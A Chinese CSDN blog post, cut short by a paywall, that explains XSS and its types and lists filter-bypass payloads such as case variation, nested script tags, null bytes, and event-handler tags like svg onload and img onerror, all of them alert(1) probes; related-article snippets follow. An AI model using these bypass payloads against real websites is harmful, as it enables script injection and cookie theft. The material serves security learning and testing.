史上总结最全的xss原理绕过防御总结,收藏学习!

最新推荐文章于 2022-09-16 20:34:57 发布
最新推荐文章于 2022-09-16 20:34:57 发布
阅读量641 收藏 3
点赞数
分类专栏: 网络安全 文章标签: xss 网络安全 信息安全 安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54787877/article/details/114854781
版权
本文深入探讨了XSS攻击的原理、分类,详细总结了各种绕过防御的技巧,包括编码、事件利用和长度限制等,并给出了XSS防御策略,如设置HttpOnly属性、过滤特殊字符和限制输入长度等。
摘要由CSDN通过智能技术生成

xss原理#

xss产生的原因是将恶意的html脚本代码插入web页面,底层原理和sql注入一样,都是因为js和php等都是解释性语言,会将输入的当做命令执行,所以可以注入恶意代码执行我们想要的内容

xss分类#

  • 存储型xss:
    js脚本代码会插入数据库,具有一定的持久性
  • 反射型xss:
    js经过后端php等语言处理
  • dom型xss:
    和反射型xss类似,但是不经过后端服务器的处理

xss绕过总结:#

自身绕过#

<script>alert('xss')</script>  //没有过滤
<Script>alert('xss')</Script> //大小写绕过
<scscriptript>alert('xss')</scscriptript> //嵌套绕过
<sc\x00ript>alert('xss')</sc\x00ript> //空字节绕过
" oonnclick=alert('XSS') //           //闭合单双引号绕过(对于html实体输入的和过滤< >)

其他标签绕过#

<a herf="javascript:alert(1)">show</a> 
<body onload=alert(1)>
<input type=image src=x:x onerror=alert(1)>
<isindex onmouseover="alert(1)" >
<form oninput=alert(1)><input></form>
<textarea autofocus onfocus=alert(1)>
<input oncut=alert(1)>
<svg onload=alert(1)>
<keygen autofocus on
最低0.47元/天 解锁文章
大白Tang
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
跨站脚本漏洞(xss原理绕过
qq_64775230的博客
06-14 69
丹尼在cookie上设置httponly标识后,浏览器就会知道这是特殊的cookie,只能由服务器检索,所有来自客户端脚本的访问都会被禁止。利用现有的xss平台,xss平台是一个测试xss漏洞获取cookie的平台,xss可以做js能做的所有事情,八廓但不限于窃取cookie、后台删改文章、钓鱼、李勇xss漏洞进行传播、修改网页代码、网站重定向、获取用户信息等。x:模式中的没有经过转义的或不在字符类中的空白数据字符总会被忽略,并且位于一个未转义的字符类外部的#字符和下一个换行符之间的字符也被忽略。
XSS绕过技术学习总结
1匹黑马
02-23 2734
文章目录XSS分类发现XSS漏洞转义字符串绕过单引号过滤绕过< SCRIPT>过滤绕过使用IMG源绕过使用制表符、 换行符和回车符绕过使用空字符进行绕过双引号配对绕过CSS过滤绕过不全面的过滤XSS分类 非持久型 非持久性:非持久性 XSS 也被称为反射性 XSS,是目前最普遍的类型,当攻击者提供了一些代码的时候,服务器端马上就会返回页面的执行结果。举个例子,就比如某个网页上...
XSS攻击来得更猛烈些吧——一种新型的绕过XSS防御的方法
cnbird's blog
10-21 2423
XSS攻击来得更猛烈些吧                                              一种新型的绕过XSS防御的方法      大家都知道,普遍的防御XSS攻击的方法是在后台对以下字符进行转义:、’、”,但是经过本人的研究发现,在一些特殊场景下,即使对以上字符进行了转义,还是可以执行XSS攻击的。  首先看一个JS的例子:        var s
XSS原理
weixin_34372728的博客
12-31 49
跨站脚本攻击(Cross-Site Scripting),是一种网站应用程序的安全漏洞,是代码注入攻击的一种。 XSS的种类: 反射型XSS: 非持久型XSS(需要自行触发,输入-输出)。 从目标服务器通过错误信息、搜索结果等等方式“反射”出来的。 非持久性:这种攻击方式往往只具有一次性。 方式:攻击者通过邮件的方式将含有注入脚本的恶意的链接发送给受害者,受害者点击链接...
浅谈xss原理
weixin_34308389的博客
05-04 63
近日,论坛上面XSS满天飞,各处都能够见到XSS的痕迹,前段时间论坛上面也出现了XSS的迹象。然后我等小菜不是太懂啊,怎么办?没办法仅仅有求助度娘跟谷歌这对情侣了。 能够说小菜也算懂了一些。不敢藏私,故发文出来大家一块学习,讨论。 以下是正文: 0x00:xss的来由 记得之前看过一篇文章,这样来形容XSS “ 假设把浏览器看作WEB2.0后时代的操作系统。...
sql注入绕过方法总结
12-19
sql注入绕过方法总结绕过waf,D盾
XSSBypass:XSS绕过技术
05-17
攻击者可以通过编码、字符集转换、使用特殊字符、或者利用过滤器的逻辑漏洞来绕过防御。 - 例如,使用HTML实体编码、Base64编码、URL编码等可以避开部分过滤规则。 3. **XSS攻击的危害** - 盗取用户cookie,实现...
XSS绕过技术
10-11
XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网页安全漏洞,攻击者通过在目标网站上注入恶意脚本代码,当其他用户浏览这些页面时,嵌入的恶意脚本将被执行,从而达到窃取信息、篡改页面内容、盗取cookies...
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
xss-vuln学习通关总结
最新发布
08-24
4. **基于字符集的XSS**:利用字符转义规则的漏洞,通过Unicode等方式绕过过滤机制进行攻击。 5. **基于Flash的跨站XSS**:属于反射型XSS的一种,通过Flash中的AS脚本操作cookie,配合其他XSS攻击方法,窃取和操纵...
XSS原理、攻击方式、一些绕过姿势和防御方法
weixin_51519028的博客
09-16 2685
XSS原理、利用手法、绕过姿势、以及防御方法
xss原理及简单介绍
weixin_30657541的博客
10-22 128
XSS简单介绍—Web攻击 一 ·基础介绍 xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户游览器的控制。 二·分类 (一)持久型/存储型 非持久型xss攻击是一次性的,仅对当次的页面访问产生影响。非持久型xss攻击要求用...
XSS原理分析与解剖:第四章(编码与绕过
xysoul的专栏
04-29 653
0×01前言 很抱歉,这第四章被我推了几个月,今天是元旦难得有空,就把第四章写下。我先把主要使用的编码说下,介绍完会说下绕过。 本文建议与《杂谈如何绕过WAF》一同阅读。 0×02 URL编码 URL只允许用US-ASCII字符集中可打印的字符(0×20—0x7x),其中某些字符在HTTP协议里有特殊的意义,所以有些也不能使用。这里有个需要注意的,+加号代表URL编码的空格
Python实现Unicode绕过XSS防御:实战教程
第十六节“unicode绕过过滤触发XSS-01”教导了学习者如何利用Unicode特性来规避XSS防御,强调了理解编码规则和动态环境中的字符解析对于防止此类攻击的重要性。通过实践和理解这些技巧,防御者可以增强其Web应用程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值